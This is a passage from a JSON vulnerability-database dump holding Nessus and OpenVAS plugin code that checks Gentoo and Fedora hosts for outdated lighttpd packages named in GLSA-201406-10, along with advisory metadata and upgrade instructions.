63534, 63686, 63688, 66153);\n script_osvdb_id(99365, 99759, 99760, 104381);\n script_xref(name:\"GLSA\", value:\"201406-10\");\n\n script_name(english:\"GLSA-201406-10 : lighttpd: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201406-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All lighttpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/lighttpd\", unaffected:make_list(\"ge 1.4.35\"), vulnerable:make_list(\"lt 1.4.35\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "title": "GLSA-201406-10 : lighttpd: Multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:35:36"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:lighttpd"], "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is affected by the vulnerability described in GLSA-201406-10 (lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL statements.\n Workaround :\n\n There is no known workaround at this time.", "edition": 7, "enchantments": {"dependencies": {"modified": "2019-02-21T01:21:54", "references": [{"idList": ["PACKETSTORM:118282"], "type": "packetstorm"}, {"idList": ["LIGHTTPD_1_4_34.NASL", "MANDRIVA_MDVSA-2013-277.NASL", "FEDORA_2014-2506.NASL", "DEBIAN_DSA-2795.NASL", "FREEBSD_PKG_1CD3CA4233E611E2A2555404A67EEF98.NASL", "FEDORA_2014-2495.NASL", "OPENSUSE-2014-43.NASL", "LIGHTTPD_1_4_32.NASL", "FREEBSD_PKG_90B27045953011E39D09000C2980A9F3.NASL", "ALA_ALAS-2014-299.NASL"], "type": "nessus"}, {"idList": ["1337DAY-ID-17319"], "type": "zdt"}, {"idList": ["SECURITYVULNS:VULN:12116", "SECURITYVULNS:DOC:27504", "SECURITYVULNS:DOC:27485", "SECURITYVULNS:DOC:30003", "SECURITYVULNS:VULN:13626", "SECURITYVULNS:DOC:30381", "SECURITYVULNS:VULN:13405"], "type": "securityvulns"}, {"idList": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "type": "cve"}, {"idList": ["EDB-ID:22902", "EDB-ID:18295"], "type": "exploitdb"}, {"idList": ["GLSA-201406-10"], "type": "gentoo"}, {"idList": ["OPENVAS:867539", "OPENVAS:1361412562310120553", "OPENVAS:1361412562310120162", "OPENVAS:1361412562310867539", "OPENVAS:867540", "OPENVAS:1361412562310121213", "OPENVAS:866877", "OPENVAS:1361412562310867540", "OPENVAS:892795", "OPENVAS:1361412562310892795"], "type": "openvas"}, {"idList": ["SUSE-SU-2014:0474-1", "OPENSUSE-SU-2014:0449-1", "OPENSUSE-SU-2014:0496-1"], "type": "suse"}, {"idList": ["1CD3CA42-33E6-11E2-A255-5404A67EEF98", "C6521B04-314B-11E1-9CF4-5404A67EEF98", "90B27045-9530-11E3-9D09-000C2980A9F3"], "type": "freebsd"}, {"idList": ["MYHACK58:62201788804"], "type": "myhack58"}, {"idList": ["DEBIAN:DSA-2381-:320B8", "DEBIAN:DSA-2877-1:CD2D1", "DEBIAN:DSA-2795-1:2DAAE", "DEBIAN:DSA-2368-1:91542"], "type": "debian"}, {"idList": ["SSV:60476", "SSV:72453", "SSV:61980", "SSV:24275", "SSV:76695", "SSV:30003", "SSV:26120"], "type": "seebug"}, {"idList": ["ALAS-2013-179", "ALAS-2014-299", "ALAS-2012-107"], "type": "amazon"}]}, "score": {"modified": "2019-02-21T01:21:54", "value": 8.2, "vector": "NONE"}}, "hash": "b5ed92c198c303f0e003edabcb645b031bb5113e201725ea6557070fd61f9431", "hashmap": [{"hash": "6c5dba810aeab70d01eba769ffba08ab", "key": "references"}, {"hash": "9ee165aded032a2baf9a181faf11a74c", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "4e75371be5bbd5341cf892fef0e9c013", "key": "title"}, {"hash": "774fce555a963c00be305187dd6dff95", "key": "cvss"}, {"hash": "f346bc8435b78109bc682f41b009e5b5", "key": "cvelist"}, {"hash": "20ba12b0faa8a5525529ad167476e074", "key": "published"}, {"hash": "349e4405289c3c80feb5483aec6488bd", "key": "href"}, {"hash": "c0470adc003771bc6ae5d6914349f929", "key": "cpe"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "ed8cba01682fb0f90eb366101e3256da", "key": "description"}, {"hash": "650bdfae1cb37826e27306825abaf826", "key": "sourceData"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=76062", "id": "GENTOO_GLSA-201406-10.NASL", "lastseen": "2019-02-21T01:21:54", "modified": "2018-07-12T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "76062", "published": "2014-06-16T00:00:00", "references": ["https://security.gentoo.org/glsa/201406-10"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201406-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76062);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);\n script_xref(name:\"GLSA\", value:\"201406-10\");\n\n script_name(english:\"GLSA-201406-10 : lighttpd: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201406-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All lighttpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/lighttpd\", unaffected:make_list(\"ge 1.4.35\"), vulnerable:make_list(\"lt 1.4.35\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "title": "GLSA-201406-10 : lighttpd: Multiple vulnerabilities", "type": "nessus", "viewCount": 5}, "differentElements": ["cvss", "description", "reporter", "modified", "href"], "edition": 7, "lastseen": "2019-02-21T01:21:54"}], "edition": 9, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "c0470adc003771bc6ae5d6914349f929"}, {"key": "cvelist", "hash": "f346bc8435b78109bc682f41b009e5b5"}, {"key": "cvss", "hash": "ed80408f65b06df34ed6dfdb743af507"}, {"key": "description", "hash": "a05ab3ced445f2578684b24e5a530e18"}, {"key": "href", "hash": "38a5f873bbf7b0934702849e098af575"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "cf18d881f0f76f23f322ed3f861d3616"}, {"key": "pluginID", "hash": "9ee165aded032a2baf9a181faf11a74c"}, {"key": "published", "hash": "20ba12b0faa8a5525529ad167476e074"}, {"key": "references", "hash": "6c5dba810aeab70d01eba769ffba08ab"}, {"key": "reporter", "hash": "eebc0e5cad997220d136d9e0c6386556"}, {"key": "sourceData", "hash": "650bdfae1cb37826e27306825abaf826"}, {"key": "title", "hash": "4e75371be5bbd5341cf892fef0e9c013"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "f7c5243bea94ad0a00b130536c48084b8c1a121cf1a8580b7a3f9a8c3821c8ec", "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310121213", "OPENVAS:1361412562310867539", "OPENVAS:1361412562310120162", "OPENVAS:867539", "OPENVAS:867540", "OPENVAS:892795", "OPENVAS:1361412562310867540", "OPENVAS:1361412562310892795", "OPENVAS:1361412562310120553", "OPENVAS:866877"]}, {"type": "gentoo", "idList": ["GLSA-201406-10"]}, {"type": "cve", "idList": ["CVE-2012-5533", "CVE-2011-4362", "CVE-2014-2323", "CVE-2013-4560", "CVE-2013-4559", "CVE-2013-4508"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30003", "SECURITYVULNS:VULN:13405", "SECURITYVULNS:DOC:27504", "SECURITYVULNS:DOC:27485", "SECURITYVULNS:VULN:12116"]}, {"type": "nessus", "idList": ["ALA_ALAS-2014-299.NASL", "DEBIAN_DSA-2795.NASL", "FEDORA_2014-2506.NASL", "OPENSUSE-2014-43.NASL", "FEDORA_2014-2495.NASL", "FREEBSD_PKG_90B27045953011E39D09000C2980A9F3.NASL", "MANDRIVA_MDVSA-2013-277.NASL", "LIGHTTPD_1_4_34.NASL", "FEDORA_2013-15345.NASL", "OPENSUSE-2012-801.NASL"]}, {"type": "freebsd", "idList": ["90B27045-9530-11E3-9D09-000C2980A9F3", "C6521B04-314B-11E1-9CF4-5404A67EEF98", "1CD3CA42-33E6-11E2-A255-5404A67EEF98"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2795-1:2DAAE", "DEBIAN:DSA-2381-:320B8", "DEBIAN:DSA-2368-1:91542", "DEBIAN:DSA-2877-1:CD2D1"]}, {"type": "amazon", "idList": ["ALAS-2014-299", "ALAS-2013-179", "ALAS-2012-107", "ALAS-2014-346"]}, {"type": "seebug", "idList": ["SSV:30003", "SSV:60476", "SSV:76695", "SSV:26120", "SSV:24275", "SSV:72453", "SSV:61980"]}, {"type": "exploitdb", "idList": ["EDB-ID:22902", "EDB-ID:18295"]}, {"type": "myhack58", "idList": ["MYHACK58:62201788804"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:118282"]}, {"type": "zdt", "idList": ["1337DAY-ID-17319"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:0449-1", "SUSE-SU-2014:0474-1"]}], "modified": "2019-11-01T02:40:33"}, "score": {"value": 8.2, "vector": "NONE", "modified": "2019-11-01T02:40:33"}, "vulnersScore": 8.2}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201406-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76062);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);\n script_xref(name:\"GLSA\", value:\"201406-10\");\n\n script_name(english:\"GLSA-201406-10 : lighttpd: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201406-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All lighttpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/lighttpd\", unaffected:make_list(\"ge 1.4.35\"), vulnerable:make_list(\"lt 1.4.35\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "naslFamily": "Gentoo Local Security Checks", "pluginID": "76062", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:lighttpd"], "scheme": null}
{"openvas": [{"lastseen": "2019-05-29T18:36:21", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201406-10", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121213", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121213", "title": "Gentoo Security Advisory GLSA 201406-10", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201406-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121213\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:20 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201406-10\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in lighttpd. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201406-10\");\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201406-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-servers/lighttpd\", unaffected: make_list(\"ge 1.4.35\"), vulnerable: make_list(\"lt 1.4.35\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:18", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-02-25T00:00:00", "id": "OPENVAS:1361412562310867539", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867539", "title": "Fedora Update for lighttpd FEDORA-2014-2495", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2014-2495\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867539\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:21:23 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-4560\", \"CVE-2013-4559\", \"CVE-2013-4508\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for lighttpd FEDORA-2014-2495\");\n script_tag(name:\"affected\", value:\"lighttpd on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-2495\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128980.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lighttpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.34~3.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:48:38", "bulletinFamily": "scanner", "description": "Check for the Version of lighttpd", "modified": "2017-07-10T00:00:00", "published": "2014-02-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867539", "id": "OPENVAS:867539", "title": "Fedora Update for lighttpd FEDORA-2014-2495", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2014-2495\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867539);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:21:23 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-4560\", \"CVE-2013-4559\", \"CVE-2013-4508\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for lighttpd FEDORA-2014-2495\");\n\n tag_insight = \"Secure, fast, compliant and very flexible web-server which has been optimized\nfor high-performance environments. It has a very low memory footprint compared\nto other webservers and takes care of cpu-load. Its advanced feature-set\n(FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make\nit the perfect webserver-software for every server that is suffering load\nproblems.\n\";\n\n tag_affected = \"lighttpd on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2495\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128980.html\");\n script_summary(\"Check for the Version of lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.34~3.fc20\", rls:\"FC20\")) != NULL)\n 